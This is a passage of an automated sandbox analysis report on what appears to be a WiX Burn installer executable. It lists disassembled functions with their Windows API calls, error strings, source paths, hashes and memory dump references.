                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                                                                                                                                            • String ID: Failed to treat attribute value as UInt64.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlGetAttribute
                                                                                                                                                                                                                                                                            • API String ID: 3379191133-2593243594
                                                                                                                                                                                                                                                                            • Opcode ID: 2869462f582786dfe1e2e625741f26ef247979f7dbfb3f6ef80bdc02bb26dad7
                                                                                                                                                                                                                                                                            • Instruction ID: 6e4544b8c8f8e8fed0fe15bc463004e7b5791f0d2a24e57408aec1b78a91ba67
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2869462f582786dfe1e2e625741f26ef247979f7dbfb3f6ef80bdc02bb26dad7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3118F71E40318FFDB219F94CC85E9EBB78EB44754F10C1A5FA05AB291E2718F00DA91
                                                                                                                                                                                                                                                                            Function 009434CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000004,00000004,?,?,00000000,?,00000000,00000000,?,?,008FC427,?,?,00000004,?,00000004), ref: 009434F1
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,008FC427,?,?,00000004,?,00000004,00000004,?,?,00000004,?,00000004,00000004), ref: 009434FB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastRead
                                                                                                                                                                                                                                                                            • String ID: Failed to read data from file handle.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1948546556-2736598211
                                                                                                                                                                                                                                                                            • Opcode ID: 0d5e86b92fa9ff695b5c14286140cbc85261231d209a4ee2321d4df9f1cdce06
                                                                                                                                                                                                                                                                            • Instruction ID: dd63763f82e123a392f44824834b3a5a8efb77edd1025de8b7efe14c76d927a1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d5e86b92fa9ff695b5c14286140cbc85261231d209a4ee2321d4df9f1cdce06
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C019273A41238BBD7209AA9DC45FAFB76CEB55B64F118125FE08F7140E264AF0096E0
                                                                                                                                                                                                                                                                            Function 0093CAFE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CBC2: RegOpenKeyExW.KERNELBASE(?,0093CBBE,00000000,00000000,00000003,00000000,?,?,00946603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0093CBED
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,008F7102,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,008E6EDE,00000000), ref: 0093CB9B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0093CB48, 0093CB84
                                                                                                                                                                                                                                                                            • Failed to open key: %ls, xrefs: 0093CB39
                                                                                                                                                                                                                                                                            • Failed to read value: %ls/@%ls, xrefs: 0093CB75
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpen
                                                                                                                                                                                                                                                                            • String ID: Failed to open key: %ls$Failed to read value: %ls/@%ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 47109696-2566192520
                                                                                                                                                                                                                                                                            • Opcode ID: bd4ef5d0514845bae6ecf8f039ea8b3eb32f0875fe1ce9004fed4b2085b7de00
                                                                                                                                                                                                                                                                            • Instruction ID: b665799b3c7bb2d6f47ecd734167da91fc587f6c43057f1db2abf90b8d1262cd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd4ef5d0514845bae6ecf8f039ea8b3eb32f0875fe1ce9004fed4b2085b7de00
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A211A977A40628B7DF229E95CC0BFAEBA79EB45714F048110FB5875190D2B24E60FBD1
                                                                                                                                                                                                                                                                            Function 008E7337 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E7385
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E7398
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7357
                                                                                                                                                                                                                                                                            • Failed while running , xrefs: 008E7345
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessagePostWindow
                                                                                                                                                                                                                                                                            • String ID: Failed while running $d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3618638489-2348268852
                                                                                                                                                                                                                                                                            • Opcode ID: d049b01796b18f059dca4d69d32b03b2e2ba9c2e8580d598f9b9f435a114f290
                                                                                                                                                                                                                                                                            • Instruction ID: 336417e77ae7d8d59c6b293f4add2beb0b94e3662538355477ee6f7161eb9583
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d049b01796b18f059dca4d69d32b03b2e2ba9c2e8580d598f9b9f435a114f290
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B311E571900249BEDB51EBA6CC09FBFB6B8FF02710F400122F900E1191E7709A90EB91
                                                                                                                                                                                                                                                                            Function 008E97A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 008E97B5
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,008E6E9A,00000001,008E6DEA,?,?,?,00947562,00000000), ref: 0093BFE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetProcAddress.KERNEL32(00000000), ref: 0093BFE8
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetLastError.KERNEL32(?,?,?,00947562,00000000), ref: 0093C010
                                                                                                                                                                                                                                                                              • Part of subcall function 008E8AA9: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020019,00000002,00000000), ref: 008E8B61
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E9811
                                                                                                                                                                                                                                                                            • Failed to set variant value., xrefs: 008E97FF
                                                                                                                                                                                                                                                                            • Failed to get 64-bit folder., xrefs: 008E97D8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to get 64-bit folder.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3109562764-867371702
                                                                                                                                                                                                                                                                            • Opcode ID: b9ed109c4d5e82f2d5cfdd6ac9b59a9a14492a1de00e17a39d83e2d8597bd7e6
                                                                                                                                                                                                                                                                            • Instruction ID: 9948b43d46b2fecb072375d0c00128ba078481b3124be7e0ad6c722c7cef3037
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9ed109c4d5e82f2d5cfdd6ac9b59a9a14492a1de00e17a39d83e2d8597bd7e6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0101D671940268BBDF21AB97CC06E9FBA6CFF82B50F104162F904F61A1E6F09E409790
                                                                                                                                                                                                                                                                            Function 0091996C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55serviceCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ControlService.ADVAPI32(0091984C,00000001,?,00000000,00000000,?,?,?,?,?,?,0091984C,00000000), ref: 00919994
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,0091984C,00000000), ref: 0091999E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ControlErrorLastService
                                                                                                                                                                                                                                                                            • String ID: Failed to stop wusa service.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4114567744-2199517983
                                                                                                                                                                                                                                                                            • Opcode ID: 095e010564d69694a3f76ad841b4728b45492e3db838f3b3a61301e7ed543e54
                                                                                                                                                                                                                                                                            • Instruction ID: f60c67563aaf8cff0040c8646e664d9f3285cc1c54cd8ba9afd9523a28dd4656
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 095e010564d69694a3f76ad841b4728b45492e3db838f3b3a61301e7ed543e54
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E001B572B0022877DB109A699C45FAFB6ACEB4AB54F014129FD05FB280E564AC4086E5
                                                                                                                                                                                                                                                                            Function 00943B63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,008EE202,0100147D,?,?,00000000,00000000), ref: 00943B7B
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008EE202,0100147D,?,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 00943B85
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastSize
                                                                                                                                                                                                                                                                            • String ID: Failed to get size of file.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 464720113-3816715765
                                                                                                                                                                                                                                                                            • Opcode ID: 678e149692a7ab28ca2667a5b700b860c92e27b355366be9513a81736a476418
                                                                                                                                                                                                                                                                            • Instruction ID: e71c1aed22e4f58b016ac54840fce77cfe23aba25ba1cc2d16968baba3a81338
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 678e149692a7ab28ca2667a5b700b860c92e27b355366be9513a81736a476418
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F30188B6A102297BD7105B55DC45F7EBBACEF45754F01811ABD04E7240E374AE00D7E0
                                                                                                                                                                                                                                                                            Function 00940474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00940489
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 009404DB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed SysAllocString
                                                                                                                                                                                                                                                                            • API String ID: 344208780-608482133
                                                                                                                                                                                                                                                                            • Opcode ID: d174f40b284ac649ca97172e7bd83b3ba364315c374d1c48c07c2fcea27686bb
                                                                                                                                                                                                                                                                            • Instruction ID: 6cbec507c3143308eab6caee57483467e4851d5052d283628e542b495bf0a95d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d174f40b284ac649ca97172e7bd83b3ba364315c374d1c48c07c2fcea27686bb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B01DB72640225B7CB325F199C48F6F7AACEBC5B64F158015FF08A7260E7758D01D6E1
                                                                                                                                                                                                                                                                            Function 008E1839 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50libraryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E13DA: GetModuleHandleW.KERNEL32(kernel32,00000000,008E15E3,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13ED
                                                                                                                                                                                                                                                                              • Part of subcall function 008E13DA: GetLastError.KERNEL32(?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13F9
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get load library with LOAD_LIBRARY_SEARCH_SYSTEM32., xrefs: 008E1893
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp, xrefs: 008E1888, 008E188D, 008E189F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$HandleLibraryLoadModule
                                                                                                                                                                                                                                                                            • String ID: Failed to get load library with LOAD_LIBRARY_SEARCH_SYSTEM32.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4252302101-2751505537
                                                                                                                                                                                                                                                                            • Opcode ID: b32d3331257cdc058c38a00aaee660609298b8a77904fabe278c571b259cff93
                                                                                                                                                                                                                                                                            • Instruction ID: a65bdebcbf2765f149f19f036b2e8be5522245cc6c547e2a073e7ec3e6021437
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b32d3331257cdc058c38a00aaee660609298b8a77904fabe278c571b259cff93
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF018F7AA4157577DF615A5A8C0EF5E7A58FB03BA1F014135FE08EB290E6708C0097D5
                                                                                                                                                                                                                                                                            Function 008F5766 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 008F5793
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 008F57BA
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008F57C4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • BootstrapperApplicationDestroy, xrefs: 008F578B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                                                                                                                            • String ID: BootstrapperApplicationDestroy
                                                                                                                                                                                                                                                                            • API String ID: 1144718084-3186005537
                                                                                                                                                                                                                                                                            • Opcode ID: e2446a45bcd722e2dd97974ee374c1f632a714874e74b3a3c71a6fbf570cc841
                                                                                                                                                                                                                                                                            • Instruction ID: 13d945fceb9dbcf4556607a9f67d6e88a9f8e4631dcf86fa0a8ad201b7f603bc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2446a45bcd722e2dd97974ee374c1f632a714874e74b3a3c71a6fbf570cc841
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28016D3690462DEBCB109FA5D84496EFBB8FB04765F10812AEA15E7550DB709D008BC0
                                                                                                                                                                                                                                                                            Function 0093D789 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,008F7A20,008E6CF2,EstimatedSize,000000FF,008E6CF2,00000000,?,008F9AF0,00000000,00000390,000000F8,008E6CF2,009031C1,00000000,00000000), ref: 0093D7AD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                                            • String ID: EstimatedSize$Failed to set %ls value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3702945584-416555833
                                                                                                                                                                                                                                                                            • Opcode ID: cb2304808044283c90e70752388b4d0e8557670574dd4299d86b9f294bc5fda6
                                                                                                                                                                                                                                                                            • Instruction ID: 2a2a680bb8f41c2cad7557b204541317566d66405b826c62bc7f3930a7d0f710
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb2304808044283c90e70752388b4d0e8557670574dd4299d86b9f294bc5fda6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF04CBB2011197BEB215A076C09F9F7B5DEBC5B60F054025BB18DB290E6308C01C6B0
                                                                                                                                                                                                                                                                            Function 0094003B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(008E7D5B), ref: 00940050
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 009400A0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
